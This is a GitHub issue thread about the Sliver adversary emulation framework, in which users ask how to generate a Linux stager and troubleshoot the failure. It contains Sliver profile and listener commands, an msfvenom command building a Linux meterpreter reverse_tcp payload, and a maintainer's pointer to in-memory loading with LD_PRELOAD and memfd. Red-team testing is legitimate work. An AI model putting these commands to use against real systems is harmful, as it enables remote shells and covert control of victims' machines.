BishopFox / sliver

Adversary Emulation Framework
GNU General Public License v3.0
8.16k stars 1.07k forks source link

How to generate stager on linux? #1734

Open runt0 opened 1 month ago

runt0 commented 1 month ago

Hello: The linux implants is about 13M, I want to generate stager on linux. I have read the doc and generate the stager on windows successfully,but I dont find any info about linux, how can I reduces the size of the payload on linux?

info

[*] Client v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - linux/amd64
    Compiled at 2024-02-29 03:46:53 +0800 CST
    Compiled with go version go1.20.7 linux/amd64

[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df - linux/amd64
    Compiled at 2024-02-29 03:46:53 +0800 CST

command

generate stager --lhost 127.0.0.1 --lport 8443 --protocol https --save /tmp --format c --os linux

error

[!] Error: rpc error: code = Unknown desc = linux is currently not supported - Please make sure Metasploit framework >= v6.2 is installed and msfvenom/msfconsole are in your PATH

log

INFO[2024-07-04T10:07:56+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK 
ERRO[2024-07-04T10:09:04+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:09:57+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:10:41+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:15:14+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
ERRO[2024-07-04T10:18:50+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
INFO[2024-07-04T10:24:18+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK 
INFO[2024-07-04T10:25:49+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:220] finished unary call with code OK 
ERRO[2024-07-04T10:29:42+08:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown 
NoPurposeInLife commented 1 month ago

Same, even after trying with

profiles new beacon --mtls 192.168.12.233:80  -o linux --arch amd64 linux64_profile

stage-listener -u tcp://0.0.0.0:443 -p linux64_profile -P
mtls -L 0.0.0.0 -l 80

And generate the stager via msfvenom

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.233 LPORT=443 -f elf -o met123.elf

Executing the stager results in segmentation fault, but tcpdump shows the initial connection, then it segmentation faults after

moloch-- commented 1 month ago

We don't have a shellcode/stager version in the framework for Linux, I recommend using LD_PRELOAD and memfd (there's a lot of examples online how to do this) to load over the network directly into memory on Linux.

NoPurposeInLife commented 1 month ago

Does this mean sliver cannot handle Linux meterpreter shells or linux reverse tcp shells?

rkervella commented 1 month ago

Sliver is not compatible with meterpreter's Linux stager, no.